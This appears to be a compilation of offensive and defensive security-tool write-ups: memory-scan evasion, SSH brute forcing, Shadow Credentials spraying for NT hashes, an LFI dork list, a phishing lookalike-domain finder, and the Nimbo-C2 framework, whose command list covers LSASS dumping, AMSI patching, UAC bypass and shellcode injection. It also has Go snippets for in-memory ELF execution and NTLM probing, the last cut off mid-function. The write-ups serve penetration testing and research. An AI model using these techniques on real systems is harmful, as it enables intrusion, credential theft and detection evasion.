  • Remarks for live environments. (WAF AWS, WAF GCP, ...)

Authors

Alex Hernandez aka (@_alt3kx_)
Jesus Huerta aka @mindhack03d

Contributors

Israel Zeron Medina aka @spk085



RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints

By: Zion3R


This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain will change the main module memory page's protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique, check out the original project, Gargoyle. x64 only.

The idea is to set up a hardware breakpoint in kernel32!Sleep and a new top-level exception filter to handle the exception. When Sleep is called, the exception filter function set beforehand is triggered, allowing us to call the ROP chain without the need for classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well-known DLLs.

The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.


The overview of the process is as follows:

  • We use SetUnhandledExceptionFilter to set a new exception filter function.
  • SetThreadContext is used in order to set a hardware breakpoint on kernel32!Sleep.
  • We call Sleep, triggering the hardware breakpoint and driving the execution flow towards our exception filter function.
  • The ROP chain is called from the exception filter function, allowing us to change the current memory page protection to N/A. Then SleepEx is called. Finally, the ROP chain restores the RX memory protection and normal execution continues.

This process repeats indefinitely.

As can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which avoids memory scans looking for pages with execution permission.

Compilation

Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

After that, simply compile the code and run the tool:

C:\Users\User\Desktop\RustChain> cargo build
C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe

Limitations

This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).

Credits



Cbrutekrag - Penetration Tests On SSH Servers Using Brute Force Or Dictionary Attacks. Written In C

By: Zion3R


Penetration tests on SSH servers using dictionary attacks. Written in C.

brute krag means "brute force" in Afrikaans

Disclaimer

This tool is for ethical testing purpose only.
cbrutekrag and its owners can't be held responsible for misuse by users.
Users have to act as permitted by local law rules.


Requirements

cbrutekrag uses libssh - The SSH Library (http://www.libssh.org/)

Build

Requirements:

  • make
  • gcc compiler
  • libssh-dev
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
make
make install

Static build

Requirements:

  • cmake
  • gcc compiler
  • make
  • libssl-dev
  • libz-dev
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
bash static-build.sh
make install

Run

$ cbrutekrag -h
_ _ _
| | | | | |
___ | |__ _ __ _ _| |_ ___| | ___ __ __ _ __ _
/ __|| '_ \| '__| | | | __/ _ \ |/ / '__/ _` |/ _` |
| (__ | |_) | | | |_| | || __/ <| | | (_| | (_| |
\___||_.__/|_| \__,_|\__\___|_|\_\_| \__,_|\__, |
OpenSSH Brute force tool 0.5.0 __/ |
(c) Copyright 2014-2022 Jorge Matricali |___/


usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst]
[-t THREADS] [-o OUTPUT.txt] [TARGETS...]

-h This help
-v Verbose mode
-V Verbose mode (sshlib)
-s Scan mode
-D Dry run
-P Progress bar
-T <targets> Targets file
-C <combinations> Username and password file
-t <threads> Max threads
-o <output> Output log file
-a Accepts non OpenSSH servers
-A Allow servers detected as honeypots.

Example usages

cbrutekrag -T targets.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24

Supported targets syntax

  • 192.168.0.1
  • 10.0.0.0/8
  • 192.168.100.0/24:2222
  • 127.0.0.1:2222

Combinations file format

root root
root password
root $BLANKPASS$


AIDE 0.18.3

AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on server. It uses regular expressions for determining which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.

Simple Universal Fortigate Fuzzer

Simple python script to send commands prepared in text files mutated by an example payload string, e.g. multiple A or B letters. Using Fortigate's credentials, a user should be able to use this script to automate a basic fuzzing process for commands available in CLI.

Samhain File Integrity Checker 4.4.10

Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.

ShadowSpray - A Tool To Spray Shadow Credentials Across An Entire Domain In Hopes Of Abusing Long Forgotten GenericWrite/GenericAll DACLs Over Other Objects In The Domain

By: Zion3R


A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.

Why this tool

In a lot of engagements I see (in BloodHound) that the group "Everyone" / "Authenticated Users" / "Domain Users" or some other wide group, which contains almost all the users in the domain, has some GenericWrite/GenericAll DACLs over other objects in the domain.


These rights can be abused to add Shadow Credentials on the target object and obtain its TGT and NT hash.

It occurred to me that we can just try to spray shadow credentials over the entire domain and see what sticks (obviously this approach is better suited to non-stealth engagements; don't use this in a red team where stealth is required). When a Shadow Credential is successfully added, we simply do the whole PKINIT + UnPACTheHash dance and voilà - we get NT hashes.

Since the process is extremely fast, this can be used at the very start of the engagement, and hopefully you'll have some users and computers owned before you even start.

Note: I recycled a lot of code from my previous tool so AV/EDRs might flag this as KrbRelayUp...

How this tool works

It goes something like this:

  1. Login to the domain with the supplied credentials (Or use the current session).
  2. Check that the domain functional level is 2016 (Otherwise stop since the Shadow Credentials attack won't work)
  3. Gather a list of all the objects in the domain (users and computers) from LDAP.
  4. For every object in the list do the following:
    1. Try to add KeyCredential to the object's "msDS-KeyCredentialLink" attribute.
    2. If the above is successful, use PKINIT to request a TGT using the added KeyCredential.
    3. If the above is successful, perform an UnPACTheHash attack to reveal the user/computer NT hash.
    4. If --RestoreShadowCred was specified: Remove the added KeyCredential (clean up after yourself...)
  5. If --Recursive was specified: Do the same process using each of the user/computer accounts we successfully owned.

ShadowSpray supports CTRL+C so if at any point you wish to stop the execution just hit CTRL+C and ShadowSpray will display the NT Hashes recovered so far before exiting (as shown in the demo below).

Usage

 __             __   __        __   __   __
/__` |__| /\ | \ / \ | | /__` |__) |__) /\ \ /
.__/ | | /~~\ |__/ \__/ |/\| .__/ | | \ /~~\ |


Usage: ShadowSpray.exe [-d FQDN] [-dc FQDN] [-u USERNAME] [-p PASSWORD] [-r] [-re] [-cp CERT_PASSWORD] [-ssl]

-r (--RestoreShadowCred) Restore "msDS-KeyCredentialLink" attribute after the attack is done. (Optional)
-re (--Recursive) Perform the ShadowSpray attack recursively. (Optional)
-cp (--CertificatePassword) Certificate password. (default = random password)


General Options:
-u (--Username) Username for initial LDAP authentication. (Optional)
-p (--Password) Password for initial LDAP authentication. (Optional)
-d (--Domain) FQDN of domain. (Optional)
-dc (--DomainController) FQDN of domain controller. (Optional)
-ssl Use LDAP over SSL. (Optional)
-y (--AutoY) Don't ask for confirmation to start the ShadowSpray attack. (Optional)

TODO

  • Code refactoring and cleanup!!!
  • Add Verbose output option
  • Add option to save KeyCredentials added / TGT requested / NT Hashes gathered to a file on disk
  • Python version ;)
  • Other suggestions will be welcomed

Mitigation and Detection

Taken from Elad Shamir's blog post on Shadow Credentials:

  • If PKINIT authentication is not common in the environment or not common for the target account, the "Kerberos authentication ticket (TGT) was requested" event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank.

  • If a SACL is configured to audit Active Directory object modifications for the targeted account, the "Directory service object was modified" event (5136) can indicate anomalous behavior if the subject changing the msDS-KeyCredentialLink is not the Azure AD Connect synchronization account or the ADFS service account, which will typically act as the Key Provisioning Server and legitimately modify this attribute for users.

  • A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the attribute msDS-KeyCredentialLink for any account not meant to be enrolled in Key Trust passwordless authentication, and particularly privileged accounts.

  • Detecting UnPACing and shadowed credentials by Henri Hambartsumyan of FalconForce

ShadowSpray specific detections:

  • This tool attempts to modify every user/computer object in the domain in a very short timeframe; when it fails (most of the time) it generates an LDAP_INSUFFICIENT_ACCESS error. It's possible to build detection around that, using the same approach as detecting a regular password spray.

Acknowledgements



PassMute - A Multi Featured Password Transmutation/Mutator Tool

By: Zion3R


This is a command-line tool written in Python that applies one or more transmutation rules to a given password or a list of passwords read from one or more files. The tool can be used to generate transformed passwords for security testing or research purposes. It is also a very useful tool for brute forcing passwords during pentests!


How can PassMute help make passwords more secure?

PassMute can help to generate strong and complex passwords by applying different transformation rules to the input password. However, password security also depends on other factors such as the length of the password, randomness, and avoiding common phrases or patterns.

The transformation rules include:

reverse: reverses the password string

uppercase: converts the password to uppercase letters

lowercase: converts the password to lowercase letters

swapcase: swaps the case of each letter in the password

capitalize: capitalizes the first letter of the password

leet: replaces some letters in the password with their leet equivalents

strip: removes all whitespace characters from the password
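A sketch of what the rules above amount to, as plain Python functions (the tool's own leet table and implementation details may differ):

# Each rule maps a password string to a transformed string.
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"})

RULES = {
    "reverse":    lambda p: p[::-1],
    "uppercase":  str.upper,
    "lowercase":  str.lower,
    "swapcase":   str.swapcase,
    "capitalize": str.capitalize,
    "leet":       lambda p: p.translate(LEET),
    "strip":      lambda p: "".join(p.split()),  # drop all whitespace
}

password = "HITH Hack3r"
for rule in ("leet", "reverse", "swapcase"):
    password = RULES[rule](password)
print(password)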

The tool can also write the transformed passwords to an output file and run the transformation process in parallel using multiple threads.

Installation

git clone https://github.com/HITH-Hackerinthehouse/PassMute.git
cd PassMute
chmod +x PassMute.py

Usage

To use the tool, you need to have Python 3 installed on your system. Then, you can run the tool from the command line using the following options:

python PassMute.py [-h] [-f FILE [FILE ...]] -r RULES [RULES ...] [-v] [-p PASSWORD] [-o OUTPUT] [-t THREAD_TIMEOUT] [--max-threads MAX_THREADS]

Here's a brief explanation of the available options:

-h or --help: shows the help message and exits

-f (FILE) [FILE ...], --file (FILE) [FILE ...]: one or more files to read passwords from

-r (RULES) [RULES ...] or --rules (RULES) [RULES ...]: one or more transformation rules to apply

-v or --verbose: prints verbose output for each password transformation

-p (PASSWORD) or --password (PASSWORD): transforms a single password

-o (OUTPUT) or --output (OUTPUT): output file to save the transformed passwords

-t (THREAD_TIMEOUT) or --thread-timeout (THREAD_TIMEOUT): timeout for threads to complete (in seconds)

--max-threads (MAX_THREADS): maximum number of threads to run simultaneously (default: 10)

NOTE: If you get any error regarding the argparse module, simply install it with the following command: pip install argparse

Examples

Here are some example commands that apply transformation rules to a single password or a list of passwords read from a file, and save the transformed passwords to an output file:

Single Password transmutation: python PassMute.py -p HITHHack3r -r leet reverse swapcase -v -t 50

Multiple Password transmutation: python PassMute.py -f testwordlists.txt -r leet reverse -v -t 100 -o testupdatelists.txt

Verbose mode and threads are recommended when transmuting big files; depending on your processor, you don't need to use threads and verbose mode every time.

Legal Disclaimer:

You might be super excited to use this tool; so are we. But here we need to be clear: Hackerinthehouse, any contributor of this project and GitHub won't be responsible for any actions made by you. This tool is made for security research and educational purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.



Lfi-Space - LFI Scan Tool

By: Zion3R

Written by TMRSWRR

Version 1.0.0

All in one tools for LFI VULN FINDER -LFI DORK FINDER

Instagram: TMRSWRR


Screenshots


How to use


Read Me

LFI Space is a robust and efficient tool designed to detect Local File Inclusion (LFI) vulnerabilities in web applications. This tool simplifies the process of identifying potential security flaws by leveraging two distinct scanning methods: Google Dork Search and Targeted URL Scan. With its comprehensive approach, LFI Space assists security professionals, penetration testers, and ethical hackers in assessing the security posture of web applications.

The Google Dork Search functionality within LFI Space harnesses the power of the Google search engine to identify web pages that may be susceptible to LFI attacks. By employing carefully crafted Google dorks, the tool retrieves search results that are likely to contain vulnerable pages. These dorks are specific queries designed to target common LFI vulnerability patterns in web applications. LFI Space then analyzes the responses from these pages, meticulously examining the content to identify any signs of LFI vulnerabilities. This approach allows for a broad and automated search, rapidly surfacing potential targets for further investigation.

Additionally, LFI Space provides a Targeted URL Scan feature, enabling users to manually input a list of specific URLs for scanning. This functionality allows for a more focused approach, enabling security professionals to assess particular web applications or pages of interest. By scanning each URL individually, LFI Space thoroughly inspects the target web pages for any signs of LFI vulnerabilities. This targeted approach provides flexibility and precision in identifying potential security weaknesses.

It is important to note that LFI Space is intended for responsible and authorized use, such as security testing, vulnerability assessments, or penetration testing, with proper consent and legal permissions. It is crucial to adhere to ethical guidelines and respect the privacy and security of targeted systems.

In conclusion, LFI Space is a powerful tool that combines Google Dork Search and Targeted URL Scan functionalities to detect Local File Inclusion vulnerabilities in web applications. By automating the search for potentially vulnerable pages and providing the ability to scan specific URLs, LFI Space empowers security professionals to identify LFI vulnerabilities effectively. With its user-friendly interface and comprehensive scanning capabilities, LFI Space is an invaluable asset for enhancing the security posture of web applications.

  • Google Dork Search: The tool queries the Google search engine to find web pages that may be vulnerable to LFI attacks based on carefully crafted Google dorks. It then analyzes the responses of these pages to determine if any LFI vulnerabilities exist.
  • Targeted URL Scan: The tool accepts a list of URLs as input and scans each URL for LFI vulnerabilities. This feature allows for a more focused approach, enabling users to assess specific web applications or pages of interest.

LFI Find Dork

inurl:/filedown.php?file=
inurl:/news.php?include=
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:index2.php?to=
inurl:index.php?load=
inurl:home.php?pagina=
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=
  • This dork list is in the lfi2.txt file

Installation

Installation with requirements.txt

git clone https://github.com/capture0x/Lfi-Space/
cd Lfi-Space
pip3 install -r requirements.txt

Usage

python3 lfi.py

Bugs and enhancements

Contributions are welcome! If you find any issues or have suggestions for improvements, please open an issue or submit a pull request.

For bug reports or enhancements, please open an issue here.

Copyright 2023



TLDHunt - Domain Availability Checker

By: Zion3R


TLDHunt is a command-line tool designed to help users find available domain names for their online projects or businesses. By providing a keyword and a list of TLD (top-level domain) extensions, TLDHunt checks the availability of domain names that match the given criteria. This tool is particularly useful for those who want to quickly find a domain name that is not already taken, without having to perform a manual search on a domain registrar website.

For red teaming or phishing purposes, this tool can help you to find similar domains with different extensions from the original domain.


Dependencies

This tool is written in Bash and the only dependency required is whois. Therefore, make sure that you have installed whois on your system. In Debian, you can install whois using the following command:

sudo apt install whois -y

How It Works?

To detect whether a domain is registered or not, we search for the words "Name Server" in the output of the WHOIS command, as this is a signature of a registered domain. If you have a better signature or detection method, please feel free to submit a pull request.
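In Python terms (the tool itself is a Bash wrapper around whois), the check described above boils down to:

# Sketch of the registration check: a domain counts as registered
# when "Name Server" shows up in its whois output.
import subprocess

def is_registered(domain: str) -> bool:
    result = subprocess.run(["whois", domain], capture_output=True, text=True)
    return "Name Server" in result.stdout

for ext in (".com", ".net", ".org"):
    domain = "linuxsec" + ext
    print(domain, "Registered" if is_registered(domain) else "Not Registered")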

Domain Extension List

You can use your custom tlds.txt list, but make sure that it is formatted like this:

.aero
.asia
.biz
.cat
.com
.coop
.info
.int
.jobs
.mobi

How to Use

➜ TLDHunt ./tldhunt.sh
_____ _ ___ _ _ _
|_ _| | | \| || |_ _ _ _| |_
| | | |__| |) | __ | || | ' \ _|
|_| |____|___/|_||_|\_,_|_||_\__|
Domain Availability Checker

Keyword is required.
Usage: ./tldhunt.sh -k <keyword> [-e <tld> | -E <exts>] [-x]
Example: ./tldhunt.sh -k linuxsec -E tlds.txt

Example of TLDHunt usage:

./tldhunt.sh -k linuxsec -E tlds.txt

You can add -x flag to print only Not Registered domain. Example:

./tldhunt.sh -k linuxsec -E tlds.txt -x

Screenshot



Indicator-Intelligence - Finds Related Domains And IPv4 Addresses To Do Threat Intelligence After Indicator-Intelligence Collects Static Files

By: Zion3R


Finds related domains and IPv4 addresses to do threat intelligence after Indicator-Intelligence collects static files.


Done

  • Collect related domains and IPs

Installation

From Source Code

You can use virtualenv for package dependencies before installation.

git clone https://github.com/OsmanKandemir/indicator-intelligence.git
cd indicator-intelligence
python setup.py build
python setup.py install

From Pypi

The script is available on PyPI. To install with pip:

pip install indicatorintelligence

From Dockerfile

You can run this application in a container after building it from the Dockerfile.

docker build -t indicator .
docker run indicator --domains target-web.com --json

From DockerHub

docker pull osmankandemir/indicator
docker run osmankandemir/indicator --domains target-web.com --json

From Poetry

pip install poetry
poetry install

Usage

-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o JSON, --json JSON JSON output. --json

Function Usage

Development and Contribution

See; CONTRIBUTING.md

License

Copyright (c) 2023 Osman Kandemir
Licensed under the GPL-3.0 License.

Donations

If you like Indicator-Intelligence and would like to show support, you can use Buy A Coffee or the GitHub Sponsors feature for the developer, using the button below.

You can use the GitHub sponsor tiers feature for purchasing and other perks.

Sponsor me : https://github.com/sponsors/OsmanKandemir



SpiderSuite - Advance Web Spider/Crawler For Cyber Security Professionals

By: Zion3R


An advanced cross-platform and multi-feature GUI web spider/crawler for cyber security professionals. Spider Suite can be used for attack surface mapping and analysis. For more information visit SpiderSuite's website.


Installation and Usage

Spider Suite is designed for easy installation and usage even for first timers.

  • First, download the package of your choice.

  • Then install the downloaded SpiderSuite package.

  • See First time crawling with SpiderSuite article for tutorial on how to get started.

For complete documentation of Spider Suite see wiki.

Contributing

Can you translate?

Visit SpiderSuite's translation project to make translations to your native language.

Not a developer?

You can help by reporting bugs, requesting new features, improving the documentation, sponsoring the project & writing articles.

For More information see contribution guide.

Contributors

Credits

This product includes software developed by the following open source projects:



Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

By: Zion3R

OWASP Global AppSec Dublin - talk and demo


Features

  • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover (a sketch of the kind of dangling-record check involved follows this list)
  • scan Cloudflare for vulnerable DNS records
  • take over vulnerable subdomains yourself before attackers and bug bounty researchers
  • automatically create known issues in Bugcrowd or HackerOne
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
  • manual scans of cloud accounts with no installation
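
At their core, these scans look for DNS records whose targets no longer exist. A minimal, illustrative Go sketch of such a dangling-CNAME check (the record inventory and the NXDOMAIN heuristic are assumptions for illustration, not Domain Protect's actual logic):

package main

import (
	"errors"
	"fmt"
	"net"
)

func main() {
	// Hypothetical inventory: subdomain -> CNAME target.
	records := map[string]string{
		"assets.example.com": "example-bucket.s3.amazonaws.com",
	}
	for sub, target := range records {
		_, err := net.LookupHost(target)
		var dnsErr *net.DNSError
		if errors.As(err, &dnsErr) && dnsErr.IsNotFound {
			// Target no longer resolves: a classic takeover candidate.
			fmt.Printf("%s -> %s: NXDOMAIN, possible takeover\n", sub, target)
		}
	}
}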

Installation

Collaboration

We welcome collaborators! Please see the OWASP Domain Protect website for more details.

Documentation

Manual scans - AWS
Manual scans - CloudFlare
Architecture
Database
Reports
Automated takeover optional feature
Cloudflare optional feature
Bugcrowd optional feature
HackerOne optional feature
Vulnerability types
Vulnerable A records (IP addresses) optional feature
Requirements
Installation
Slack Webhooks
AWS IAM policies
CI/CD
Development
Code Standards
Automated Tests
Manual Tests
Conference Talks and Blog Posts

Limitations

This tool cannot guarantee 100% protection against subdomain takeovers.



Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework

By: Zion3R

About

Nimbo-C2 is yet another (simple and lightweight) C2 framework.

Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR into the process). Nim is powerful, but interacting with Windows is much easier and more robust using PowerShell, hence this combination. The Linux agent is slimmer and capable only of basic commands, including ELF loading using the memfd technique.
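
For a sense of what the memfd technique involves, here is a standalone Go sketch of in-memory ELF loading (illustrative only; the agent itself implements this in Nim, and golang.org/x/sys/unix supplies the syscall wrapper):

package main

import (
	"fmt"
	"os"
	"os/exec"

	"golang.org/x/sys/unix"
)

// Write an ELF into an anonymous in-memory file and execute it via
// /proc/self/fd/<fd>, so the payload never touches disk.
func runFromMemory(elf []byte, args ...string) error {
	fd, err := unix.MemfdCreate("demo", unix.MFD_CLOEXEC)
	if err != nil {
		return err
	}
	if _, err := unix.Write(fd, elf); err != nil {
		return err
	}
	cmd := exec.Command(fmt.Sprintf("/proc/self/fd/%d", fd), args...)
	cmd.Stdout, cmd.Stderr = os.Stdout, os.Stderr
	return cmd.Run() // "task" style: wait for the child and collect its output
}

func main() {
	elf, err := os.ReadFile("/bin/echo") // stand-in payload
	if err != nil {
		panic(err)
	}
	if err := runFromMemory(elf, "hello from memfd"); err != nil {
		panic(err)
	}
}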

All server components are written in Python:

  • HTTP listener that manages the agents.
  • Builder that generates the agent payloads.
  • Nimbo-C2 is the interactive C2 component that rules 'em all!

My work wouldn't be possible without the previous great work done by others, listed under credits.


Features

  • Build EXE, DLL, ELF payloads.
  • Encrypted implant configuration and strings using NimProtect.
  • Packing payloads using UPX and obfuscating the PE section names (UPX0, UPX1) to make detection and unpacking harder.
  • Encrypted HTTP communication (AES in CBC mode, key hardcoded in the agent and configurable via config.jsonc); see the sketch after this list.
  • Auto-completion in the C2 Console for convenient interaction.
  • In-memory Powershell commands execution.
  • File download and upload commands.
  • Built-in discovery commands.
  • Screenshot taking, clipboard stealing, audio recording.
  • Memory evasion techniques like NTDLL unhooking, ETW & AMSI patching.
  • LSASS and SAM hives dumping.
  • Shellcode injection.
  • Inline .NET assemblies execution.
  • Persistence capabilities.
  • UAC bypass methods.
  • ELF loading using memfd in 2 modes.
  • And more!
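
Regarding the encrypted HTTP channel, below is a minimal Go sketch of AES-CBC with a hardcoded key, mirroring the scheme described above (the key, PKCS#7 padding, and prepended-IV layout here are illustrative assumptions, not Nimbo-C2's exact wire format):

package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"io"
)

// Illustrative AES-CBC: PKCS#7-pad the plaintext and prepend a random IV.
func encrypt(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	plaintext = append(plaintext, bytes.Repeat([]byte{byte(pad)}, pad)...)
	out := make([]byte, aes.BlockSize+len(plaintext))
	iv := out[:aes.BlockSize]
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out[aes.BlockSize:], plaintext)
	return out, nil
}

func main() {
	key := []byte("0123456789abcdef0123456789abcdef") // stand-in for the config.jsonc key
	ct, err := encrypt(key, []byte(`{"agent":"d337c406","cmd":"pstree"}`))
	if err != nil {
		panic(err)
	}
	fmt.Printf("%x\n", ct)
}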

Installation

Easy Way

  1. Clone the repository and cd in:
git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2
  2. Build the docker image:
docker build -t nimbo-dependencies .
  3. cd again into the source files, then run the docker image interactively, exposing port 80 and mounting the Nimbo-C2 directory into the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux, replace ${pwd} with $(pwd).
cd Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies

Easier Way

git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2/Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies

Usage

First, edit config.jsonc for your needs.

Then run with: python3 Nimbo-C2.py

Use the help command for each screen, and tab completion.

Also, check the examples directory.

Main Window

Nimbo-C2 > help

--== Agent ==--
agent list -> list active agents
agent interact <agent-id> -> interact with the agent
agent remove <agent-id> -> remove agent data

--== Builder ==--
build exe -> build exe agent (-h for help)
build dll -> build dll agent (-h for help)
build elf -> build elf agent (-h for help)

--== Listener ==--
listener start -> start the listener
listener stop -> stop the listener
listener status -> print the listener status

--== General ==--
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Agent Window

Windows agent

Nimbo-2 [d337c406] > help

--== Send Commands ==--
cmd <shell-command> -> execute a shell command
iex <powershell-scriptblock> -> execute in-memory powershell command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Discovery Stuff ==--
pstree -> show process tree
checksec -> check for security products
software -> check for installed software

--== Collection Stuff ==--
clipboard -> retrieve clipboard
screenshot -> retrieve screenshot
audio <record-time> -> record audio

--== Post Exploitation Stuff ==--
lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
sam -> dump sam,security,system hives using reg.exe (elevation required)
shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
warning: make sure the assembly doesn't call any exit function

--== Evasion Stuff ==--
unhook -> unhook ntdll.dll
amsi -> patch amsi out of the current process
etw -> patch etw out of the current process

--== Persistence Stuff ==--
persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)

--== Privesc Stuff ==--
uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique

--== Interaction stuff ==--
msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
speak <text> -> speak using sapi.spvoice com interface

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Linux agent

Nimbo-2 [51a33cb9] > help

--== Send Commands ==--
cmd <shell-command> -> execute a terminal command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Post Exploitation Stuff ==--
memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
implant mode: load the elf as a child process and return
task mode: load the elf as a child process, wait on it, and get its output when it's done
(pass the whole commandline as a single string using quotes)

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Limitations & Warnings

  • Even though the HTTP communication is encrypted, the 'user-agent' header is in plain text and carries the real agent id, which some products may flag as suspicious.
  • When using the assembly command, make sure your assembly doesn't call any exit function, because it will kill the agent.
  • The shellc command may unexpectedly crash or change the injected process's behavior; test the shellcode and the target process first.
  • The audio, lsass and sam commands temporarily save artifacts to disk before exfiltrating and deleting them.
  • Cleaning the persist commands should be done manually.
  • Specify whether to keep or kill the initiating agent process in the uac commands. The die flag may leave you with no active agent (if the unelevated agent wrongly concludes that the UAC bypass succeeded), while keep should leave you with 2 active agents probing the C2; you should then manually kill the unelevated one.
  • msgbox blocks until the user presses the OK button.

Contribution

This software may be buggy or unstable in some use cases, as it is not fully and continuously tested. Feel free to open issues and PRs, and to contact me for any reason at (Gmail | Linkedin | Twitter).

Credits

  • OffensiveNim - Great resource that taught me a lot about leveraging Nim for implant tasks. Some of Nimbo-C2's agent capabilities are basically wrappers around modified OffensiveNim examples.
  • Python-Prompt-Toolkit-3 - Awesome library for developing Python CLI applications. The Nimbo-C2 interactive console was built using it.
  • ascii-image-converter - For the awesome Nimbo ascii art.
  • All those random people from GitHub & StackOverflow whose code I copied & pasted.


NTLMRecon - A Tool For Performing Light Brute-Forcing Of HTTP Servers To Identify Commonly Accessible NTLM Authentication Endpoints

By: Zion3R


NTLMRecon is a Golang version of the original NTLMRecon utility written by Sachin Kamath (AKA pwnfoo). NTLMRecon can be leveraged to perform brute forcing against a targeted webserver to identify common application endpoints supporting NTLM authentication. This includes endpoints such as the Exchange Web Services endpoint which can often be leveraged to bypass multi-factor authentication.

The tool supports collecting metadata from the exposed NTLM authentication endpoints including information on the computer name, Active Directory domain name, and Active Directory forest name. This information can be obtained without prior authentication by sending an NTLM NEGOTIATE_MESSAGE packet to the server and examining the NTLM CHALLENGE_MESSAGE returned by the targeted server. We have also published a blog post alongside this tool discussing some of the motivations behind its development and how we are approaching more advanced metadata collection within Chariot.
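
To make the mechanism concrete, below is a rough Go sketch of that unauthenticated probe: it sends a minimal NTLM NEGOTIATE_MESSAGE in the Authorization header and decodes the AV pairs of the returned CHALLENGE_MESSAGE (offsets per MS-NLMP; this is an illustration, not NTLMRecon's actual code, and the target URL is the placeholder from the examples below):

package main

import (
	"encoding/base64"
	"encoding/binary"
	"fmt"
	"net/http"
	"strings"
	"unicode/utf16"
)

// Build a minimal 32-byte NEGOTIATE_MESSAGE: "NTLMSSP\0" signature,
// message type 1, basic flags, empty domain/workstation fields (MS-NLMP).
func negotiate() string {
	msg := make([]byte, 32)
	copy(msg, "NTLMSSP\x00")
	binary.LittleEndian.PutUint32(msg[8:], 1)
	binary.LittleEndian.PutUint32(msg[12:], 0x00000207) // UNICODE|OEM|REQUEST_TARGET|NTLM
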